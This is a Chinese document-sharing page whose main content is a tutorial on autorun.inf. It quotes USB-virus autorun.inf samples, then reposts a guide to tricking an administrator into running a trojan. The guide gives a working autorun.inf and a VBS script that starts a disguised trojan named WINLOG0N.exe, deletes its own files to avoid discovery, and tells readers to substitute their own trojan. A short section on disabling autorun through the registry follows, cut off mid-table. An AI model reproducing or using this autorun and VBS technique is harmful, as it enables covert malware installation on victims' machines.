- 1、本文档共6页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
autorun.inf详解
首先是autorun.inf一般的病毒的Autorun.inf文件内容为[autorun]open=.\RECYCLER\RECYCLER\autorun.exeshell\1=Openshell\1\Command=.\RECYCLER\RECYCLER\autorun.exeshell\2\=Browsershell\2\Command=.\RECYCLER\RECYCLER\autorun.exe
shellexecute=.\RECYCLER\RECYCLER\autorun.exe它的效果是当双击打开盘时.会运行RECYCLER\RECYCLER\autorun.exe文件,用右键打开,会显示Open,Browser.还有一种是[autorun]OPEN=SVCH0ST.EXEshell\open=打开(O)shell\open\Command=SVCH0ST.EXEshell\open\Default=1shell\explore=资源管理器(X)shell\explore\Command=SVCH0ST.EXE对于这种U盘病毒,无论右键选择“打开”还是“资源管理器”病毒都会运行。一种利用autorun.inf提权的方法(转)以前看过很多关于AutoRun.inf的利用文章,网上全是千篇一律,互相模仿.我再来添点东西吧~
还是先简单说下原理吧.写一个AutoRun.inf文件,放在对方某一盘符下,当管理员双击此盘时,就会执行AutoRun.inf指定的文件了.一般用在入侵
时没有运行权限时,欺骗管理员帮你运行..
以前我在网上看到的都是一个模式
[AutoRun]
open = 你想运行的程序
先不说这样运行是不是成功的,稍微想一下,就知道有问题,人家管理员不是傻子,这样双击是打不开盘符的,人家肯定知道出问题了,所以你玩不
长的..
事实上那个文件在我机子是运行不起的,网上也没找到解决办法,相信还有很多人和我遇到过同样的问题,求人不如求已,自己搞定吧.
也不难,只要这样写就OK了:
[AutoRun]open=AutoRun.exeshellexecute=AutoRun.exeshell\Auto\command=AutoRun.exe
这样,你把它保存为一个.inf文件,放在C盘下,AutoRun.exe为你指定的运行程序.这样双击C盘就可以成功运行了.前面还说过一个问题,就是C盘
打不开,很容易就被管理员发现了,有待改进.下来就说怎么解决这个问题,GO ON!
其实这个实现起来也不难,先把AutoRun.inf上传至对方C盘,我们可以做一个自解压包,也放在C盘根目录下,让他成为我们的指定运行文件,里面
包含我们要运行的程序,比如木马,还一个VBS脚本,自解压包执行后先让他执行VBS脚本,内容如下:
set yu=wscript.createobject(wscript.shell)yu.run cmd /c start WINLOG0N.exe,0yu.run cmd /c del AutoRun.inf,0yu.run cmd /c start c:\,0yu.run cmd /c del AutoRun.vbs,0
我再简单解释下,解压后VBS帮我们运行winlogon.exe(我配置好的木马),然后删掉AutoRun.inf,为什么要删掉它,第一,减少被发现的机会,二,删
掉它,管理员重启机子或注销后如果右键点击盘复符不会出现播放,一切恢复中马前的状态,当然之前我们的木马已经运行了.第四行代码: 我
们为他打开C盘,最后再删掉vbs脚本自身.
这样改进后个人觉得安全性大大提高了.呵呵..各位在测试的时候只须把上面脚本中的 WINLOG0N.exe改为自己的木马就可以了.winxp sp2下测
试成功。防治方法其实这个文件不是病毒。也是用来打开病毒了。防治它的思路有两种:一是禁用自动播放,二是删除它,三是阻止它生成。1。在Windows系统有允许和阻止自动运行的键值的方法:
在注册表中找到如下键:
键路径:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer]
在右侧窗格中有 NoDriveTypeAutoRun这个键决定了是否执行Autorun功能.其中每一位代表一个设备,不同设备用以下数值表示:
设备名称 第几位 值 设备用如下数值表示 设备名称含义DRIVE_UNKNOWN 0 1 01h 不能识别的类型设备DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器DRIVE_REMOVABLE 2 1 04h 可
您可能关注的文档
- 2003系统序列号_64_32_linux.doc
- 20110905Pxe dhcp nfs tftp 网络安装centos.doc
- 2011-学习资料大全:如何用GHOST备份系统.doc
- 2011-学习资料大全:SQL_server2005安装图解.doc
- lesson2语言点.doc
- lesson5_what_are_you_doing?.ppt
- l鲁教版初三英语试题.doc
- M 1 Unit 2 Growing pains单元小测试.doc
- 2014年医学考博英语听力练习方法.docx
- M3U1基础知识巩固.doc
- 苏教版数学5年级上册全册教学课件.pptx
- 2024年新人教版数学七年级上册教学课件 2.1.2 第2课时 有理数的加减混合运算.pptx
- 2024年新人教版7年级上册语文教学课件 第6单元 课外古诗词诵读 课时2.pptx
- 2025年新人教版语文八年级上册全册同步名师教学设计.pdf
- 2024年秋新人教版七年级上册英语教学课件 Unit 7 Happy Birthday!(第1课时)Section A 1a-1d.pptx
- 2025年新鲁教版化学9年级全册教学设计.docx
- 新人教版七年级上册道德与法治课件 第六课 友谊之树常青 2.6.1 友谊的真谛 .pptx
- 2024年新冀教版七年级上册数学教学课件 3.3 数量之间的关系.pptx
- 新华师版数学9年级上册全册课件.pptx
- 券商投顾市场前景预测与热点营销策略研究报告.pdf
文档评论(0)